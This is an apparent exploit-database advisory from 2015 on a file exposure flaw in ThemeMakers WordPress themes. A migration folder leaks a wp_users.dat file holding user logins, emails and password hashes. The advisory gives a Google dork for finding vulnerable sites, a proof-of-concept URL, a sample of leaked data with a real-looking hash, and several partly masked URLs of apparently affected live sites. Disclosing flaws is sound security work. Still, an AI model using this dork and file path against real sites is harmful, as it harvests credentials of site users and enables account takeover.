# WordPress 'ALL Themes' Developed By "ThemeMakers" File Information Exposure
# CWE: CWE-538
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: http://themeforest.net/user/ThemeMakers/portfolio (ALL THEMES)
# Google Dork: inurl:/wp-content/uploads/tmm_db_migrate/
# PoC :
http://SITE.com/wp-content/uploads/tmm_db_migrate/wp_users.dat
Target File: wp_users.dat
array (
0 =>
array (
'ID' => '1',
'user_login' => 'xxxxxx',
'user_pass' => '$P$B5GFS1KH2VkkSZhAOAu0MT.XbNtZ1Q0',
'user_nicename' => '',
'user_email' => 'xxxxx@gmail.com',
'user_url' => '',
'user_registered' => '2014-05-06 13:22:47',
'user_activation_key' => '',
'user_status' => '0',
'display_name' => '',
),
)
# Examples:
http://ibermallXa.com/wp-content/uploads/tmm_db_migrate/wp_users.dat
http://bdfotXo.net/wp-content/uploads/tmm_db_migrate/wp_users.dat
http://www.cXy-play.com/wp-content/uploads/tmm_db_migrate/wp_users.dat
# Themes Probably Affected:
Diplomat | Political WordPress Theme
Car Dealer / Auto Dealer Responsive WP Theme
Invento Responsive Gallery/Architecture Template
Accio One Page Parallax Responsive WordPress Theme
Accio Responsive Parallax One Page Site Template
Axioma Premium Responsive WordPress Theme
Almera Responsive Portfolio WordPress Theme
Almera Responsive Portfolio Site Template
Goodnex Premium Responsive WordPress Theme
GamesTheme Premium WordPress Theme
Blessing Premium Responsive WordPress Theme
SmartIT Premium Responsive WordPress Theme
....
